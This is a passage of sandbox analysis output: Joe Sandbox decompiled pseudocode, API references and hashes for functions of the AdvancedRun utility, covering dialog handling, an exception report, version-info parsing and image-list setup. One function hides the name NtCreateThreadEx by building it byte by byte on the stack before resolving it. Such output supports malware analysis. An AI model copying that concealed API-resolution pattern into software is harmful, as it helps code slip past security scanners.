                                                                  									}
                                                                  								} else {
                                                                  									L13:
                                                                  									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                  									goto L8;
                                                                  								}
                                                                  							} else {
                                                                  								if(_t73 != 0) {
                                                                  									L30:
                                                                  									_t56 = 0;
                                                                  									__eflags = 0;
                                                                  								} else {
                                                                  									_t85 = _a12;
                                                                  									_t98 = _t85 & 0x0000ffff;
                                                                  									_v12.x = _t98;
                                                                  									_v12.y = _t85 >> 0x10;
                                                                  									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                  									_push(_v12.y);
                                                                  									_a8 = _t87;
                                                                  									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                  										__eflags =  *0x40ff30;
                                                                  										if( *0x40ff30 == 0) {
                                                                  											goto L30;
                                                                  										} else {
                                                                  											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                  											_push(_v12.y);
                                                                  											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                  											__eflags = _t90 - _t89;
                                                                  											if(_t90 != _t89) {
                                                                  												goto L30;
                                                                  											} else {
                                                                  												_push(0x40ff30);
                                                                  												goto L7;
                                                                  											}
                                                                  										}
                                                                  									} else {
                                                                  										_push(_t117 + 0x23e);
                                                                  										L7:
                                                                  										_push( *(_t117 + 0x10));
                                                                  										E00404F7E();
                                                                  										L8:
                                                                  										_t56 = 1;
                                                                  									}
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				return _t56;
			}

Memory Dump Source
• Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID: AdvancedRun
• API String ID: 829165378-481304740
• Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
• Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
• Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
• Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
Uniqueness
• Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 45%
                                                                  			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                  				void _v259;
                                                                  				void _v260;
                                                                  				void _v515;
                                                                  				void _v516;
                                                                  				char _v1048;
                                                                  				void _v1052;
                                                                  				void _v1056;
                                                                  				void _v1560;
                                                                  				long _v1580;
                                                                  				void _v3626;
                                                                  				char _v3628;
                                                                  				void _v5674;
                                                                  				char _v5676;
                                                                  				void _v9770;
                                                                  				short _v9772;
                                                                  				void* __edi;
                                                                  				void* _t45;
                                                                  				void* _t60;
                                                                  				int _t61;
                                                                  				int _t63;
                                                                  				int _t64;
                                                                  				long _t68;
                                                                  				struct HWND__* _t94;
                                                                  				signed int _t103;
                                                                  				intOrPtr _t127;
                                                                  				unsigned int _t130;
                                                                  				void* _t132;
                                                                  				void* _t135;
                                                                  
                                                                  				E0040B550(0x2628, __ecx);
                                                                  				_t45 = _a8 - 0x110;
                                                                  				if(_t45 == 0) {
                                                                  					E00404DA9(__edx, _a4, 4);
                                                                  					_v9772 = 0;
                                                                  					memset( &_v9770, 0, 0xffe);
                                                                  					_t103 = 5;
                                                                  					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                  					memset( &_v1560, 0, 0x1f6);
                                                                  					_v260 = 0;
                                                                  					memset( &_v259, 0, 0xff);
                                                                  					_v516 = 0;
                                                                  					memset( &_v515, 0, 0xff);
                                                                  					_v5676 = 0;
                                                                  					memset( &_v5674, 0, 0x7fe);
                                                                  					_v3628 = 0;
                                                                  					memset( &_v3626, 0, 0x7fe);
                                                                  					_t135 = _t132 + 0x5c;
                                                                  					_t60 = GetCurrentProcess();
                                                                  					_t105 =  &_v260;
                                                                  					_a8 = _t60;
                                                                  					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
                                                                  					__eflags = _t61;
                                                                  					if(_t61 != 0) {
                                                                  						E00404FE0( &_v5676,  &_v260, 4);
                                                                  						_pop(_t105);
                                                                  					}
                                                                  					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
                                                                  					__eflags = _t63;
                                                                  					if(_t63 != 0) {
                                                                  						E00404FE0( &_v3628,  &_v516, 0);
                                                                  						_pop(_t105);
                                                                  					}
                                                                  					_t64 = E00404BD3();
                                                                  					__eflags = _t64;
                                                                  					if(_t64 == 0) {
                                                                  						E004090EE();
                                                                  					} else {
                                                                  						E00409172();
                                                                  					}
                                                                  					__eflags =  *0x4101b8; // 0x0
                                                                  					if(__eflags != 0) {
                                                                  						L17:
                                                                  						_v1056 = 0;
                                                                  						memset( &_v1052, 0, 0x218);
                                                                  						_t127 =  *0x40f5d4; // 0x0
                                                                  						_t135 = _t135 + 0xc;
                                                                  						_t68 = GetCurrentProcessId();
                                                                  						_push(_t127);
                                                                  						_push(_t68);
                                                                  						 *0x40f84c = 0;
                                                                  						E004092F0(_t105, __eflags);
                                                                  						__eflags =  *0x40f84c; // 0x0
                                                                  						if(__eflags != 0) {
                                                                  							memcpy( &_v1056, 0x40f850, 0x21c);
                                                                  							_t135 = _t135 + 0xc;
                                                                  							__eflags =  *0x40f84c; // 0x0
                                                                  							if(__eflags != 0) {
                                                                  								wcscpy( &_v1580, E00404B3E( &_v1048));
                                                                  							}
                                                                  						}
                                                                  						goto L20;
                                                                  					} else {
                                                                  						__eflags =  *0x4101bc; // 0x0
                                                                  						if(__eflags == 0) {
                                                                  							L20:
                                                                  							_push( &_v3628);
                                                                  							_push( &_v5676);
                                                                  							_push( *0x40f3b0);
                                                                  							_push( *0x40f3bc);
                                                                  							_push( *0x40f3ac);
                                                                  							_push( *0x40f394);
                                                                  							_push( *0x40f398);
                                                                  							_push( *0x40f3a0);
                                                                  							_push( *0x40f3a4);
                                                                  							_push( *0x40f39c);
                                                                  							_push( *0x40f3a8);
                                                                  							_push( &_v1580);
                                                                  							_push( *0x40f5d4);
                                                                  							_push( *0x40f5c8);
                                                                  							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                  							_push(0x800);
                                                                  							_push( &_v9772);
                                                                  							L0040B1EC();
                                                                  							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                  							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                  							L21:
                                                                  							return 0;
                                                                  						}
                                                                  						goto L17;
                                                                  					}
                                                                  				}
                                                                  				if(_t45 == 1) {
                                                                  					_t130 = _a12;
                                                                  					if(_t130 >> 0x10 == 0) {
                                                                  						if(_t130 == 3) {
                                                                  							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                  							_a4 = _t94;
                                                                  							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                  							SendMessageW(_a4, 0x301, 0, 0);
                                                                  							SendMessageW(_a4, 0xb1, 0, 0);
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				goto L21;
			}
                                                                  0x00408cad
                                                                  0x00408ca5
                                                                  0x00408af6
                                                                  0x00408afc
                                                                  0x00408b07
                                                                  0x00408b2a
                                                                  0x00408b38
                                                                  0x00408b53
                                                                  0x00408b56
                                                                  0x00408b62
                                                                  0x00408b6a
                                                                  0x00408b6a
                                                                  0x00408b2a
                                                                  0x00408b07
                                                                  0x00000000

                                                                  APIs
                                                                  Strings
                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                  • {Unknown}, xrefs: 00408BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                  • API String ID: 4111938811-1819279800
                                                                  • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                  • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                  • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                  • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 82%
                                                                  			E0040B04D(intOrPtr* __edi, short* _a4) {
                                                                  				int _v8;
                                                                  				void* _v12;
                                                                  				void* _v16;
                                                                  				int _v20;
                                                                  				long _v60;
                                                                  				char _v572;
                                                                  				void* __esi;
                                                                  				int _t47;
                                                                  				void* _t50;
                                                                  				signed short* _t76;
                                                                  				void* _t81;
                                                                  				void* _t84;
                                                                  				intOrPtr* _t96;
                                                                  				int _t97;
                                                                  
                                                                  				_t96 = __edi;
                                                                  				_t97 = 0;
                                                                  				_v20 = 0;
                                                                  				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                  				_v8 = _t47;
                                                                  				if(_t47 > 0) {
                                                                  					_t50 = E00405AA7(__edi);
                                                                  					_push(_v8);
                                                                  					L0040B26C();
                                                                  					_t84 = _t50;
                                                                  					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                  					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                  						_t81 = _v12;
                                                                  						_t11 = _t81 + 0x30; // 0x4d46e853
                                                                  						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                  						_t13 = _t81 + 8; // 0x8d50ffff
                                                                  						 *__edi =  *_t13;
                                                                  						_t14 = _t81 + 0x14; // 0x5900004d
                                                                  						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                  						_t16 = _t81 + 0x10; // 0x65e850ff
                                                                  						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                  						_t18 = _t81 + 0x24; // 0xf4680000
                                                                  						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                  						_t20 = _t81 + 0x28; // 0xbb0040cd
                                                                  						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                  					}
                                                                  					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                  						L5:
                                                                  						wcscpy( &_v60, L"040904E4");
                                                                  					} else {
                                                                  						_t76 = _v16;
                                                                  						_push(_t76[1] & 0x0000ffff);
                                                                  						_push( *_t76 & 0x0000ffff);
                                                                  						_push(L"%4.4X%4.4X");
                                                                  						_push(0x14);
                                                                  						_push( &_v60);
                                                                  						L0040B1EC();
                                                                  						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
                                                                  							goto L5;
                                                                  						}
                                                                  					}
                                                                  					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                  					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                  					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                  					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                  					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                  					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                  					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                  					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                  					_push(_t84);
                                                                  					_t97 = 1;
                                                                  					L0040B272();
                                                                  				}
                                                                  				return _t97;
                                                                  			}
                                                                  0x0040b04d
                                                                  0x0040b05e
                                                                  0x0040b060
                                                                  0x0040b063
                                                                  0x0040b06a
                                                                  0x0040b06d
                                                                  0x0040b076
                                                                  0x0040b07b
                                                                  0x0040b07e
                                                                  0x0040b084
                                                                  0x0040b08e
                                                                  0x0040b0a8
                                                                  0x0040b0aa
                                                                  0x0040b0ad
                                                                  0x0040b0b0
                                                                  0x0040b0b3
                                                                  0x0040b0b6
                                                                  0x0040b0b8
                                                                  0x0040b0bb
                                                                  0x0040b0be
                                                                  0x0040b0c1
                                                                  0x0040b0c4
                                                                  0x0040b0c7
                                                                  0x0040b0ca
                                                                  0x0040b0cd
                                                                  0x0040b0cd
                                                                  0x0040b0e5
                                                                  0x0040b11f
                                                                  0x0040b128
                                                                  0x0040b0e7
                                                                  0x0040b0e7
                                                                  0x0040b0f1
                                                                  0x0040b0f2
                                                                  0x0040b0f3
                                                                  0x0040b0fb
                                                                  0x0040b0fd
                                                                  0x0040b0fe
                                                                  0x0040b11d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040b11d
                                                                  0x0040b13c
                                                                  0x0040b151
                                                                  0x0040b166
                                                                  0x0040b17b
                                                                  0x0040b190
                                                                  0x0040b1a5
                                                                  0x0040b1ba
                                                                  0x0040b1cf
                                                                  0x0040b1d6
                                                                  0x0040b1d7
                                                                  0x0040b1d8
                                                                  0x0040b1de
                                                                  0x0040b1e3

                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                  • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                  • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                  • _snwprintf.MSVCRT ref: 0040B0FE
                                                                  • wcscpy.MSVCRT ref: 0040B128
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                  • API String ID: 1223191525-1542517562
                                                                  • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                  • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                  • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                  • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 76%
                                                                  			E0040A1EF(struct HINSTANCE__** __esi) {
                                                                  				char _v8;
                                                                  				char _v9;
                                                                  				char _v10;
                                                                  				char _v11;
                                                                  				char _v12;
                                                                  				char _v13;
                                                                  				char _v14;
                                                                  				char _v15;
                                                                  				char _v16;
                                                                  				char _v17;
                                                                  				char _v18;
                                                                  				char _v19;
                                                                  				char _v20;
                                                                  				char _v21;
                                                                  				char _v22;
                                                                  				char _v23;
                                                                  				char _v24;
                                                                  				struct HINSTANCE__* _t27;
                                                                  
                                                                  				if( *__esi != 0) {
                                                                  					L3:
                                                                  					return 1;
                                                                  				}
                                                                  				_t27 = LoadLibraryW(L"ntdll.dll");
                                                                  				 *__esi = _t27;
                                                                  				if(_t27 != 0) {
                                                                  					asm("stosd");
                                                                  					asm("stosd");
                                                                  					asm("stosd");
                                                                  					asm("stosd");
                                                                  					asm("stosw");
                                                                  					asm("stosb");
                                                                  					_v24 = 0x4e;
                                                                  					_v23 = 0x74;
                                                                  					_v13 = 0x65;
                                                                  					_v12 = 0x61;
                                                                  					_v18 = 0x74;
                                                                  					_v17 = 0x65;
                                                                  					_v22 = 0x43;
                                                                  					_v14 = 0x72;
                                                                  					_v11 = 0x64;
                                                                  					_v21 = 0x72;
                                                                  					_v10 = 0x45;
                                                                  					_v9 = 0x78;
                                                                  					_v20 = 0x65;
                                                                  					_v19 = 0x61;
                                                                  					_v16 = 0x54;
                                                                  					_v15 = 0x68;
                                                                  					_v8 = 0;
                                                                  					__esi[1] = GetProcAddress(_t27,  &_v24);
                                                                  					goto L3;
                                                                  				}
                                                                  				return 0;
                                                                  			}
                                                                  0x0040a1f8
                                                                  0x0040a26d
                                                                  0x00000000
                                                                  0x0040a26f
                                                                  0x0040a205
                                                                  0x0040a20b
                                                                  0x0040a20d
                                                                  0x0040a213
                                                                  0x0040a214
                                                                  0x0040a215
                                                                  0x0040a216
                                                                  0x0040a217
                                                                  0x0040a219
                                                                  0x0040a21f
                                                                  0x0040a223
                                                                  0x0040a227
                                                                  0x0040a22b
                                                                  0x0040a22f
                                                                  0x0040a233
                                                                  0x0040a237
                                                                  0x0040a23b
                                                                  0x0040a23f
                                                                  0x0040a243
                                                                  0x0040a247
                                                                  0x0040a24b
                                                                  0x0040a24f
                                                                  0x0040a253
                                                                  0x0040a257
                                                                  0x0040a25b
                                                                  0x0040a25f
                                                                  0x0040a269
                                                                  0x00000000
                                                                  0x0040a26c
                                                                  0x0040a271

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                  • API String ID: 2574300362-1257427173
                                                                  • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                  • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                  • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                  • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 63%
                                                                  			E00407F8D(void* __eax) {
                                                                  				struct _SHFILEINFOW _v692;
                                                                  				void _v1214;
                                                                  				short _v1216;
                                                                  				void* _v1244;
                                                                  				void* _v1248;
                                                                  				void* _v1252;
                                                                  				void* _v1256;
                                                                  				void* _v1268;
                                                                  				void* _t37;
                                                                  				long _t38;
                                                                  				long _t46;
                                                                  				long _t48;
                                                                  				long _t58;
                                                                  				void* _t62;
                                                                  				intOrPtr* _t64;
                                                                  
                                                                  				_t64 = ImageList_Create;
                                                                  				_t62 = __eax;
                                                                  				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
                                                                  					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
                                                                  						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                  						 *(_t62 + 0x2a8) = _t48;
                                                                  						__imp__ImageList_SetImageCount(_t48, 0);
                                                                  						_push( *(_t62 + 0x2a8));
                                                                  					} else {
                                                                  						_v692.hIcon = 0;
                                                                  						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                  						_v1216 = 0;
                                                                  						memset( &_v1214, 0, 0x208);
                                                                  						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                  						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                  						 *(_t62 + 0x2a8) = _t58;
                                                                  						_push(_t58);
                                                                  					}
                                                                  					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
                                                                  				}
                                                                  				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
                                                                  					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                  					 *(_t62 + 0x2ac) = _t46;
                                                                  					__imp__ImageList_SetImageCount(_t46, 0);
                                                                  					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
                                                                  				}
                                                                  				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                  				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                  				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                  				_v1244 = _t37;
                                                                  				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
                                                                  				_t38 = GetSysColor(0xf);
                                                                  				_v1248 = _t38;
                                                                  				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
                                                                  				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
                                                                  				DeleteObject(_v1268);
                                                                  				DeleteObject(_v1268);
                                                                  				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
                                                                  			}



















                                                                  APIs
                                                                  • memset.MSVCRT ref: 00407FD0
                                                                  • memset.MSVCRT ref: 00407FE5
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                  • LoadImageW.USER32 ref: 004080B4
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                  • LoadImageW.USER32 ref: 004080D1
                                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                  • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                  • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                  • DeleteObject.GDI32(?), ref: 00408121
                                                                  • DeleteObject.GDI32(?), ref: 00408127
                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                  • String ID:
                                                                  • API String ID: 304928396-0
                                                                  • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                  • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                  • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                  • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 69%
                                                                  			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                  				int _v8;
                                                                  				void _v518;
                                                                  				long _v520;
                                                                  				void _v1030;
                                                                  				char _v1032;
                                                                  				intOrPtr _t32;
                                                                  				wchar_t* _t57;
                                                                  				void* _t58;
                                                                  				void* _t59;
                                                                  				void* _t60;
                                                                  
                                                                  				_t58 = __esi;
                                                                  				_v520 = 0;
                                                                  				memset( &_v518, 0, 0x1fc);
                                                                  				_v1032 = 0;
                                                                  				memset( &_v1030, 0, 0x1fc);
                                                                  				_t60 = _t59 + 0x18;
                                                                  				_v8 = 1;
                                                                  				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                  					_v8 = 0;
                                                                  				}
                                                                  				_t57 = _a4;
                                                                  				 *_t57 = 0;
                                                                  				if(_v8 != 0) {
                                                                  					wcscpy(_t57, L"<font");
                                                                  					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                  					if(_t32 > 0) {
                                                                  						_push(_t32);
                                                                  						_push(L" size=\"%d\"");
                                                                  						_push(0xff);
                                                                  						_push( &_v520);
                                                                  						L0040B1EC();
                                                                  						wcscat(_t57,  &_v520);
                                                                  						_t60 = _t60 + 0x18;
                                                                  					}
                                                                  					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                  					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                  						_push(E0040ADC0(_t33,  &_v1032));
                                                                  						_push(L" color=\"#%s\"");
                                                                  						_push(0xff);
                                                                  						_push( &_v520);
                                                                  						L0040B1EC();
                                                                  						wcscat(_t57,  &_v520);
                                                                  					}
                                                                  					wcscat(_t57, ">");
                                                                  				}
                                                                  				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                  					wcscat(_t57, L"<b>");
                                                                  				}
                                                                  				wcscat(_t57, _a8);
                                                                  				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                  					wcscat(_t57, L"</b>");
                                                                  				}
                                                                  				if(_v8 != 0) {
                                                                  					wcscat(_t57, L"</font>");
                                                                  				}
                                                                  				return _t57;
                                                                  			}














                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
